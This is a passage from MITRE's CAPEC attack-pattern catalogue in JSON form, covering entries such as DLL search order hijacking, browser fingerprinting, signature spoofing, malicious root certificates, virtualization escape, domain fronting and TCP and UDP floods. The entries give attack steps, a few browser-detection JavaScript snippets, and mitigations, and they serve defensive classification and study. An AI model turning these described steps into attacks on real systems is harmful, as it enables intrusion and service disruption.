adversary will be able to execute commands with elevated privileges."}]},"Prerequisites":{"Prerequisite":"A vulnerable DBMS is usedA SQL injection exists that gives an attacker access to the database or an attacker has access to the DBMS via other means"},"Skills_Required":{"Skill":["Low level knowledge of the various facilities available in different DBMS systems for interacting with the file system and operating system",{"Level":"High"}]},"Mitigations":{"Mitigation":["Design: Follow the defensive programming practices needed to protect an application accessing the database from SQL injection","Configuration: Ensure that the DBMS is patched with the latest security patches","Design: Ensure that the DBMS login used by the application has the lowest possible level of privileges in the DBMS","Design: Ensure that DBMS runs with the lowest possible level of privileges on the host machine and that it runs as a separate user","Usage: Do not use the DBMS machine for anything else other than the database","Usage: Do not place any trust in the database host on the internal network. Authenticate and validate all network activity originating from the database host.","Usage: Use an intrusion detection system to monitor network connections and logs on the database host.","Implementation: Remove / disable all unneeded / unused functions of the DBMS system that may allow an attacker to elevate privileges if compromised"]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"250"},{"CWE_ID":"89"}]},"References":{"Reference":{"External_Reference_ID":"REF-408"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Execution_Flow, Mitigations"}}},"471":{"ID":"471","Name":"Search Order Hijacking","Abstraction":"Detailed","Status":"Stable","Description":"An adversary exploits a weakness in an application\'s specification of external libraries to exploit the functionality of the loader where the process loading the library searches first in the same directory in which the process binary resides and then in other directories. Exploitation of this preferential search order can allow an attacker to make the loading process load the adversary\'s rogue library rather than the legitimate library. This attack can be leveraged with many different libraries and with many different loading processes. No forensic trails are left in the system\'s registry or file system that an incorrect library had been loaded.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"159"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Identify target general susceptibility] An attacker uses an automated tool or manually finds whether the target application uses dynamically linked libraries and the configuration file or look up table (such as Procedure Linkage Table) which contains the entries for dynamically linked libraries.","Technique":["The attacker uses a tool such as the OSX \\"otool\\" utility or manually probes whether the target application uses dynamically linked libraries.","The attacker finds the configuration files containing the entries to the dynamically linked libraries and modifies the entries to point to the malicious libraries the attacker crafted."]},{"Step":"2","Phase":"Experiment","Description":"[Craft malicious libraries] The attacker uses knowledge gained in the Explore phase to craft malicious libraries that they will redirect the target to leverage. These malicious libraries could have the same APIs as the legitimate library and additional malicious code.","Technique":"The attacker monitors the file operations performed by the target application using a tool like dtrace or FileMon. And the attacker can delay the operations by using \\"sleep(2)\\" and \\"usleep()\\" to prepare the appropriate conditions for the attack, or make the application perform expansive tasks (large files parsing, etc.) depending on the purpose of the application."},{"Step":"3","Phase":"Exploit","Description":"[Redirect the access to libraries to the malicious libraries] The attacker redirects the target to the malicious libraries they crafted in the Experiment phase. The attacker will be able to force the targeted application to execute arbitrary code when the application attempts to access the legitimate libraries.","Technique":["The attacker modifies the entries in the configuration files pointing to the malicious libraries they crafted.","The attacker leverages symlink/timing issues to redirect the target to access the malicious libraries they crafted. See also: CAPEC-132.","The attacker leverages file search path order issues to redirect the target to access the malicious libraries they crafted. See also: CAPEC-38."]}]},"Prerequisites":{"Prerequisite":"Attacker has a mechanism to place its malicious libraries in the needed location on the file system."},"Skills_Required":{"Skill":["Ability to create a malicious library.",{"Level":"Medium"}]},"Mitigations":{"Mitigation":["Design: Fix the Windows loading process to eliminate the preferential search order by looking for DLLs in the precise location where they are expected","Design: Sign system DLLs so that unauthorized DLLs can be detected."]},"Example_Instances":{"Example":["For instance, an attacker with access to the file system may place a malicious ntshrui.dll in the C:\\\\Windows directory. This DLL normally resides in the System32 folder. Process explorer.exe which also resides in C:\\\\Windows, upon trying to load the ntshrui.dll from the System32 folder will actually load the DLL supplied by the attacker simply because of the preferential search order. Since the attacker has placed its malicious ntshrui.dll in the same directory as the loading explorer.exe process, the DLL supplied by the attacker will be found first and thus loaded in lieu of the legitimate DLL. Since explorer.exe is loaded during the boot cycle, the attackers\' malware is guaranteed to execute.","macOS and OS X use a common method to look for required dynamic libraries (dylib) to load into a program based on search paths. Adversaries can take advantage of ambiguous paths to plant dylibs to gain privilege escalation or persistence. A common method is to see what dylibs an application uses, then plant a malicious version with the same name higher up in the search path. This typically results in the dylib being in the same folder as the application itself. If the program is configured to run at a higher privilege level than the current user, then when the dylib is loaded into the application, the dylib will also run at that elevated level."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"427"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"ATTACK","Entry_ID":"1574.001","Entry_Name":"Hijack Execution Flow:DLL search order hijacking"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1574.004","Entry_Name":"Hijack Execution Flow:Dylib Hijacking"}]},"References":{"Reference":{"External_Reference_ID":"REF-409"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Phases, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description, Description Summary, Examples-Instances, References, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Execution_Flow, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Taxonomy_Mappings"}],"Previous_Entry_Name":["DLL Search Order Hijacking",{"Date":"2018-07-31"}]}},"472":{"ID":"472","Name":"Browser Fingerprinting","Abstraction":"Detailed","Status":"Draft","Description":"An attacker carefully crafts small snippets of Java Script to efficiently detect the type of browser the potential victim is using. Many web-based attacks need prior knowledge of the web browser including the version of browser to ensure successful exploitation of a vulnerability. Having this knowledge allows an attacker to target the victim with attacks that specifically exploit known or zero day weaknesses in the type and version of the browser used by the victim. Automating this process via Java Script as a part of the same delivery system used to exploit the browser is considered more efficient as the attacker can supply a browser fingerprinting method and integrate it with exploit code, all contained in Java Script and in response to the same web page request by the browser.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"541"}},"Prerequisites":{"Prerequisite":"Victim\'s browser visits a website that contains attacker\'s Java ScriptJava Script is not disabled in the victim\'s browser"},"Mitigations":{"Mitigation":"Configuration: Disable Java Script in the browser"},"Example_Instances":{"Example":{"p":"The following code snippets can be used to detect various browsers:","div":{"style":"margin-left:10px;","div":["Firefox 2/3",{"style":"color:#32498D; font-weight:bold;"},"FF=/a/[-1]==\'a\'",{"style":"margin-left:10px;"},"Firefox 3",{"style":"color:#32498D; font-weight:bold;"},"FF3=(function x(){})[-5]==\'x\'",{"style":"margin-left:10px;"},"Firefox 2",{"style":"color:#32498D; font-weight:bold;"},"FF2=(function x(){})[-6]==\'x\'",{"style":"margin-left:10px;"},"IE",{"style":"color:#32498D; font-weight:bold;"},"IE=\'\\\\v\'==\'v\'",{"style":"margin-left:10px;"},"Safari",{"style":"color:#32498D; font-weight:bold;"},"Saf=/a/.__proto__==\'//\'",{"style":"margin-left:10px;"},"Chrome",{"style":"color:#32498D; font-weight:bold;"},"Chr=/source/.test((/a/.toString+\'\'))",{"style":"margin-left:10px;"},"Opera",{"style":"color:#32498D; font-weight:bold;"},"Op=/^function \\\\(/.test([].sort)",{"style":"margin-left:10px;"}]}}},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":{"External_Reference_ID":"REF-410"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"}}},"473":{"ID":"473","Name":"Signature Spoof","Abstraction":"Standard","Status":"Draft","Description":"An attacker generates a message or datablock that causes the recipient to believe that the message or datablock was generated and cryptographically signed by an authoritative or reputable source, misleading a victim or victim operating system into performing malicious actions.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"151","Exclude_Related":[{"Exclude_ID":"512"},{"Exclude_ID":"403"}]}},"Prerequisites":{"Prerequisite":["The victim or victim system is dependent upon a cryptographic signature-based verification system for validation of one or more security events or actions.","The validation can be bypassed via an attacker-provided signature that makes it appear that the legitimate authoritative or reputable source provided the signature."]},"Skills_Required":{"Skill":["Technical understanding of how signature verification algorithms work with data and applications",{"Level":"High"}]},"Consequences":{"Consequence":{"Scope":["Access Control","Authentication"],"Impact":"Gain Privileges"}},"Example_Instances":{"Example":["An attacker provides a victim with a malicious executable disguised as a legitimate executable from an established software by signing the executable with a forged cryptographic key. The victim\'s operating system attempts to verify the executable by checking the signature, the signature is considered valid, and the attackers\' malicious executable runs.","An attacker exploits weaknesses in a cryptographic algorithm to that allow a private key for a legitimate software vendor to be reconstructed, attacker-created malicious software is cryptographically signed with the reconstructed key, and is installed by the victim operating system disguised as a legitimate software update from the software vendor."]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"20"},{"CWE_ID":"327"},{"CWE_ID":"290"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"}}},"474":{"ID":"474","Name":"Signature Spoofing by Key Theft","Abstraction":"Detailed","Status":"Draft","Description":"An attacker obtains an authoritative or reputable signer\'s private signature key by theft and then uses this key to forge signatures from the original signer to mislead a victim into performing actions that benefit the attacker.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"473"}},"Prerequisites":{"Prerequisite":"An authoritative or reputable signer is storing their private signature key with insufficient protection."},"Skills_Required":{"Skill":["Knowledge of common location methods and access methods to sensitive data",{"Level":"Low"},"Ability to compromise systems containing sensitive data",{"Level":"High"}]},"Mitigations":{"Mitigation":["Restrict access to private keys from non-supervisory accounts","Restrict access to administrative personnel and processes only","Ensure all remote methods are secured","Ensure all services are patched and up to date"]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"522"}},"References":{"Reference":[{"External_Reference_ID":"REF-411"},{"External_Reference_ID":"REF-412"},{"External_Reference_ID":"REF-413"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Mitigations"}]}},"475":{"ID":"475","Name":"Signature Spoofing by Improper Validation","Abstraction":"Detailed","Status":"Draft","Description":"An adversary exploits a cryptographic weakness in the signature verification algorithm implementation to generate a valid signature without knowing the key. Signature verification algorithms are generally used to determine whether a certificate or piece of code (e.g. executable, binary, etc.) possesses a valid signature and can be trusted. If the leveraged algorithm confirms that a valid signature exists, it establishes a foundation of trust that is further conveyed to the end-user when interacting with a website or application. However, if the signature verification algorithm improperly validates the signature, either by not validating the signature at all or by failing to fully validate the signature, it could result in an adversary generating a spoofed signature and being classified as a legitimate entity. Successfully exploiting such a weakness could further allow the adversary to reroute users to malicious sites, steals files, activates microphones, records keystrokes and passwords, wipes disks, installs malware, and more.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"473"},{"Nature":"CanPrecede","CAPEC_ID":"542"}]},"Prerequisites":{"Prerequisite":"Recipient is using a weak cryptographic signature verification algorithm or a weak implementation of a cryptographic signature verification algorithm, or the configuration of the recipient\'s application accepts the use of keys generated using cryptographically weak signature verification algorithms."},"Skills_Required":{"Skill":["Cryptanalysis of signature verification algorithm",{"Level":"High"},"Reverse engineering and cryptanalysis of signature verification algorithm implementation",{"Level":"High"}]},"Mitigations":{"Mitigation":"Use programs and products that contain cryptographic elements that have been thoroughly tested for flaws in the signature verification routines."},"Example_Instances":{"Example":"The Windows CryptoAPI (Crypt32.dll) was shown to be vulnerable to signature spoofing by failing to properly validate Elliptic Curve Cryptography (ECC) certificates. If the CryptoAPI\'s signature validator allows the specification of a nonstandard base point (G): \\"An attacker can create a custom ECDSA certificate with an elliptic curve (ECC) signature that appears to match a known standard curve, like P-256 that includes a public key for an existing known trusted certificate authority, but which was in fact not signed by that certificate authority. Windows checks the public key and other curve parameters, but not the (bespoke attacker-supplied) base point generator (G) parameter constant which actually generated the curve\\" [REF-562]. Exploiting this vulnerability allows the adversary to leverage a spoofed certificate to dupe trusted network connections and deliver/execute malicious code, while appearing as legitimately trusted entity [REF-563]. This ultimately tricks the victim into believing the malicious website or executable is legitimate and originates from a properly verified source. See also: CVE-2020-0601"},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"347"},{"CWE_ID":"327"},{"CWE_ID":"295"}]},"References":{"Reference":[{"External_Reference_ID":"REF-562"},{"External_Reference_ID":"REF-563"},{"External_Reference_ID":"REF-564"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Example_Instances, References, Related_Attack_Patterns, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description, Example_Instances"}]}},"476":{"ID":"476","Name":"Signature Spoofing by Misrepresentation","Abstraction":"Detailed","Status":"Draft","Description":"An attacker exploits a weakness in the parsing or display code of the recipient software to generate a data blob containing a supposedly valid signature, but the signer\'s identity is falsely represented, which can lead to the attacker manipulating the recipient software or its victim user to perform compromising actions.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"473"}},"Prerequisites":{"Prerequisite":"Recipient is using signature verification software that does not clearly indicate potential homographs in the signer identity.Recipient is using signature verification software that contains a parsing vulnerability, or allows control characters in the signer identity field, such that a signature is mistakenly displayed as valid and from a known or authoritative signer."},"Skills_Required":{"Skill":["Attacker needs to understand the layout and composition of data blobs used by the target application.",{"Level":"High"},"To discover a specific vulnerability, attacker needs to reverse engineer signature parsing, signature verification and signer representation code.",{"Level":"High"},"Attacker may be required to create malformed data blobs and know how to insert them in a location that the recipient will visit.",{"Level":"High"}]},"Mitigations":{"Mitigation":"Ensure the application is using parsing and data display techniques that will accurately display control characters, international symbols and markings, and ultimately recognize potential homograph attacks."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"290"}},"References":{"Reference":{"External_Reference_ID":"REF-414"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"}}},"477":{"ID":"477","Name":"Signature Spoofing by Mixing Signed and Unsigned Content","Abstraction":"Detailed","Status":"Draft","Description":"An attacker exploits the underlying complexity of a data structure that allows for both signed and unsigned content, to cause unsigned data to be processed as though it were signed data.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"473"}},"Prerequisites":{"Prerequisite":["Signer and recipient are using complex data storage structures that allow for a mix between signed and unsigned data","Recipient is using signature verification software that does not maintain separation between signed and unsigned data once the signature has been verified."]},"Skills_Required":{"Skill":["The attacker may need to continuously monitor a stream of signed data, waiting for an exploitable message to appear.",{"Level":"High"},"Attacker must be able to create malformed data blobs and know how to insert them in a location that the recipient will visit.",{"Level":"High"}]},"Mitigations":{"Mitigation":"Ensure the application is fully patched and does not allow the processing of unsigned data as if it is signed data."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"693"},{"CWE_ID":"311"},{"CWE_ID":"319"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"}}},"478":{"ID":"478","Name":"Modification of Windows Service Configuration","Abstraction":"Detailed","Status":"Usable","Description":"An adversary exploits a weakness in access control to modify the execution parameters of a Windows service. The goal of this attack is to execute a malicious binary in place of an existing service.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"203"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Determine target system] The adversary must first determine the system they wish to modify the registry of. This needs to be a windows machine as this attack only works on the windows registry."},{"Step":"2","Phase":"Experiment","Description":"[Gain access to the system] The adversary needs to gain access to the system in some way so that they can modify the windows registry.","Technique":["Gain physical access to a system either through shoulder surfing a password or accessing a system that is left unlocked.","Gain remote access to a system through a variety of means."]},{"Step":"3","Phase":"Exploit","Description":"[Modify windows registry] The adversary will modify the windows registry by changing the configuration settings for a service. Specifically, the adversary will change the path settings to define a path to a malicious binary to be executed."}]},"Prerequisites":{"Prerequisite":"The adversary must have the capability to write to the Windows Registry on the targeted system."},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Execute Unauthorized Commands","Note":"By altering specific configuration settings for the service, the adversary could run arbitrary code to be executed."}},"Mitigations":{"Mitigation":"Ensure proper permissions are set for Registry hives to prevent users from modifying keys for system components that may lead to privilege escalation."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"284"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"ATTACK","Entry_ID":"1574.011","Entry_Name":"Hijack Execution Flow:Service Registry Permissions Weakness"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1543.003","Entry_Name":"Create or Modify System Process:Windows Service"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2018-04-25"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Description, Execution_Flow"}]}},"479":{"ID":"479","Name":"Malicious Root Certificate","Abstraction":"Detailed","Status":"Stable","Description":"An adversary exploits a weakness in authorization and installs a new root certificate on a compromised system. Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website. Adversaries have used this technique to avoid security warnings prompting users when compromised systems connect over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login credentials.","Likelihood_Of_Attack":"Low","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"473"}},"Prerequisites":{"Prerequisite":"The adversary must have the ability to create a new root certificate."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"284"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1553.004","Entry_Name":"Subvert Trust Controls:Install Root Certificate"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2018-04-26"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"}}},"480":{"ID":"480","Name":"Escaping Virtualization","Abstraction":"Standard","Status":"Draft","Description":"An adversary gains access to an application, service, or device with the privileges of an authorized or privileged user by escaping the confines of a virtualized environment. The adversary is then able to access resources or execute unauthorized code within the host environment, generally with the privileges of the user running the virtualized process. Successfully executing an attack of this type is often the first step in executing more complex attacks.","Likelihood_Of_Attack":"Low","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"115"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Probing] The adversary probes the target application, service, or device to find a possible weakness that would allow escaping the virtualized environment.","Technique":"Probing applications, services, or devices for virtualization weaknesses."},{"Step":"2","Phase":"Experiment","Description":"[Verify the exploitable security weaknesses] Using the found weakness, the adversary attempts to escape the virtualized environment.","Technique":"Using an application weakness to escape a virtualized environment"},{"Step":"3","Phase":"Exploit","Description":"[Execute more complex attacks] Once outside of the virtualized environment, the adversary attempts to perform other more complex attacks such as accessing system resources or executing unauthorized code within the host environment.","Technique":"Executing complex attacks when given higher permissions by escaping a virtualized environment"}]},"Consequences":{"Consequence":[{"Scope":["Access Control","Authorization"],"Impact":"Bypass Protection Mechanism"},{"Scope":"Authorization","Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":["Accountability","Authentication","Authorization","Non-Repudiation"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":["Ensure virtualization software is current and up-to-date.","Abide by the least privilege principle to avoid assigning users more privileges than necessary."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"693"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1611","Entry_Name":"Escape to Host"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2019-09-30"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}]}},"481":{"ID":"481","Name":"Contradictory Destinations in Traffic Routing Schemes","Abstraction":"Standard","Status":"Draft","Description":"Adversaries can provide contradictory destinations when sending messages. Traffic is routed in networks using the domain names in various headers available at different levels of the OSI model. In a Content Delivery Network (CDN) multiple domains might be available, and if there are contradictory domain names provided it is possible to route traffic to an inappropriate destination. The technique, called Domain Fronting, involves using different domain names in the SNI field of the TLS header and the Host field of the HTTP header. An alternative technique, called Domainless Fronting, is similar, but the SNI field is left blank.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"161","Exclude_Related":{"Exclude_ID":"515"}}},"Prerequisites":{"Prerequisite":["An adversary must be aware that their message will be routed using a CDN, and that both of the contradictory domains are served from that CDN.","If the purpose of the Domain Fronting is to hide redirected C2 traffic, the C2 server must have been created in the CDN."]},"Skills_Required":{"Skill":["The adversary must have some knowledge of how messages are routed.",{"Level":"Medium"}]},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":["Read Data","Modify Data"]}},"Mitigations":{"Mitigation":"Monitor connections, checking headers in traffic for contradictory domain names, or empty domain names."},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1090.004","Entry_Name":"Proxy:Domain Fronting"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2019-04-04"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated @Abstraction"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns, Taxonomy_Mappings"}]}},"482":{"ID":"482","Name":"TCP Flood","Abstraction":"Standard","Status":"Draft","Description":"An adversary may execute a flooding attack using the TCP protocol with the intent to deny legitimate users access to a service. These attacks exploit the weakness within the TCP protocol where there is some state information for the connection the server needs to maintain.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"125"}},"Prerequisites":{"Prerequisite":"This type of an attack requires the ability to generate a large amount of TCP traffic to send to the target port of a functioning server."},"Mitigations":{"Mitigation":"To mitigate this type of an attack, an organization can monitor incoming packets and look for patterns in the TCP traffic to determine if the network is under an attack. The potential target may implement a rate limit on TCP SYN messages which would provide limited capabilities while under attack."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"770"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"ATTACK","Entry_ID":"1499.001","Entry_Name":"Endpoint Denial of Service:OS Exhaustion Flood"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1498.001","Entry_Name":"Network Denial of Service:Direct Network Flood"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"485":{"ID":"485","Name":"Signature Spoofing by Key Recreation","Abstraction":"Detailed","Status":"Draft","Description":"An attacker obtains an authoritative or reputable signer\'s private signature key by exploiting a cryptographic weakness in the signature algorithm or pseudorandom number generation and then uses this key to forge signatures from the original signer to mislead a victim into performing actions that benefit the attacker.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"473"}},"Prerequisites":{"Prerequisite":["An authoritative signer is using a weak method of random number generation or weak signing software that causes key leakage or permits key inference.","An authoritative signer is using a signature algorithm with a direct weakness or with poorly chosen parameters that enable the key to be recovered using signatures from that signer."]},"Skills_Required":{"Skill":["Cryptanalysis of signature generation algorithm",{"Level":"High"},"Reverse engineering and cryptanalysis of signature generation algorithm implementation and random number generation",{"Level":"High"},"Ability to create malformed data blobs and know how to present them directly or indirectly to a victim.",{"Level":"High"}]},"Mitigations":{"Mitigation":"Ensure cryptographic elements have been sufficiently tested for weaknesses."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"330"}},"References":{"Reference":[{"External_Reference_ID":"REF-419"},{"External_Reference_ID":"REF-420"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}}},"486":{"ID":"486","Name":"UDP Flood","Abstraction":"Standard","Status":"Draft","Description":"An adversary may execute a flooding attack using the UDP protocol with the intent to deny legitimate users access to a service by consuming the available network bandwidth. Additionally, firewalls often open a port for each UDP connection destined for a service with an open UDP port, meaning the firewalls in essence save the connection state thus the high packet nature of a UDP flood can also overwhelm resources allocated to the firewall. UDP attacks can also target services like DNS or VoIP which utilize these protocols. Additionally, due to the session-less nature of the UDP protocol, the source of a packet is easily spoofed making it difficult to find the source of the attack.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"125"}},"Prerequisites":{"Prerequisite":"This type of an attack requires the ability to generate a large amount of UDP traffic to send to the desired port of a target service using UDP."},"Mitigations":{"Mitigation":"To mitigate this type of an attack, modern firewalls drop UDP traffic destined for closed ports, and unsolicited UDP reply packets. A variety of other countermeasures such as universal reverse path forwarding and remote triggered black holing(RFC3704) along with modifications to BGP like black hole routing and sinkhole routing(RFC3882) help mitigate the spoofed source IP nature of these attacks."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"770"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1498.001","Entry_Name":"Network Denial of Service:Direct Network 